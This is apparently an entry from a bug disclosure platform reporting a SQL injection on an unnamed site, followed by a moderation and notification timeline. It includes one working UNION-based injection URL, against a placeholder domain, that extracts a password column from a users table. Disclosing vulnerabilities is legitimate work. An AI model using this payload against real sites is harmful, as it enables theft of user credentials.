SQL injection

Detailed information

Have SQL injection on site.
By using this weakness possible Steal sensitive information from the site (Passwords, site structure, etc.)
Sql inject- siteaddress.com/blog_leftsidebar.php?id=-2%27+union+select+1,sifre,3,4+from+istifadeciler--+-%27

Comments

04 April 2017, 17:27
Vulnerability status
Have not any information from source
05 January 2017, 19:59
Vulnerability status
Sended e-mail to source about vulnerability
03 January 2017, 17:03
Added point to Vulnerability
Moderator gave 7 point from 10 to vulnerability
03 January 2017, 17:03
Vulnerability status
Confirmed by Moderator
31 December 2016, 12:53
Vulnerability changed
Vulnerability "SQL injection" changed
28 December 2016, 15:58
Vulnerability cancelled
1. Eger SQL injectiondursa onun unvanini ve usulu yollayim. 2. Eger Admin by pass-dirsa admin qovlughunu yollayin.
23 December 2016, 22:23
Vulnerability added
Vulnerability added to BUGemot

Company name is hidden 23 December 2016, 22:23

Detailed information

Comments

BUG TYPE

ABOUT VULNERABILITY

SQL injection

Company name is hidden 23 December 2016, 22:23

Detailed information

Comments

BUG TYPE

ABOUT VULNERABILITY

LOGIN

REGISTER